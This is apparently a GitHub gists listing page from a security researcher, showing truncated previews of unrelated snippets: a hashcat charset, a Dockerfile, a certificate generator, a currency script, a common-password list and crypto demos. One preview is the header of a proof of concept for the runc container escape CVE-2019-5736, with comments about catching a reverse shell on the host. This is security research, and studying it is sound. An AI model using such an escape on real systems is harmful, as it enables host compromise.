A Windows Arabic Code Page (CP1256) hashcat charset file. Its use is described by hashcat here. The original blog post describing it can be found at NTHashes and Encodings.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
FROM alpine:latest as builder | |
LABEL maintainer="@singe at SensePost <research@sensepost.com>" | |
RUN apk update && apk --no-cache add \ | |
build-base \ | |
&& rm -rf /var/cache/apk/* | |
WORKDIR / | |
COPY yellow.c canary32.c canary32.h / | |
RUN gcc -o yellow yellow.c canary32.c |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
# Simple CA cert generator & leaf cert signer | |
# By dominic@sensepost.com | |
# All rights reserved 2019 | |
ca_prefix="ca" | |
leaf_prefix="host" | |
ca_validity="1825" #days | |
leaf_validity="730" #days | |
size=2048 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/python3 | |
# Silly PoC for CVE-2019-5736 in Python by @singe (with help from @_staaldraad, @frichette_n & @_cablethief) | |
# Target will need a python3 interpreter | |
# Edit IP info below, on the host run a netcat to catch the reverse shell | |
# Run this python file in the container | |
# Then from the host: docker exec -i <container name> /tmp/evil | |
import os | |
import stat | |
host='172.17.0.1' |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/sh | |
UA="Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_4) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.1 Safari/605.1.15" | |
url="https://www.xe.com/currencyconverter/convert/" | |
amount="$1" | |
fromcur="$2" | |
tocur="$3" | |
if [ "$fromcur" == "" ]; then #Use default currencies | |
fromcur="ZAR" | |
tocur="GBP" | |
fi |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
123456789:allowed | |
linkedin:allowed | |
000000:allowed | |
linked:allowed | |
1234567890:allowed | |
222222:allowed | |
555555:allowed | |
pakistan:allowed | |
chocolate:allowed | |
Linkedin:allowed |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
git clone https://github.com/linuxkit/linuxkit | |
cd linuxkit | |
currdir=$(pwd) | |
make | |
export PATH=$PATH:$currdir/bin | |
foo=$(grep isoEfi\ $currdir/src/cmd/linuxkit/vendor/github.com/moby/tool/src/moby/output.go|cut -d\" -f2) | |
docker pull $foo | |
cd examples | |
linuxkit build --format iso-efi docker-for-mac.yml | |
mv /Applications/Docker.app/Contents/Resources/linuxkit/docker-for-mac.iso /Applications/Docker.app/Contents/Resources/linuxkit/docker-for-mac.iso.orig |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python3 | |
# A simple demo of Python requests to reverse proxy | |
# It's an intermediate between vanilla requests and Selenium | |
# It let's you interact programatically, but still run JS in | |
# the browser, without Selenium overhead | |
# | |
# This is an example of automating aspects of Facebook | |
# | |
# by @singe |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python3 | |
from Cryptodome.Cipher import AES | |
from Cryptodome.Random import get_random_bytes | |
pairwiseTransientKey = b'pairwiseTransKey' | |
EAPOLheader = b'Unencrypted Frame Stuff' | |
plaintext1 = b'Attack at dawn' | |
nonce1 = get_random_bytes(11) |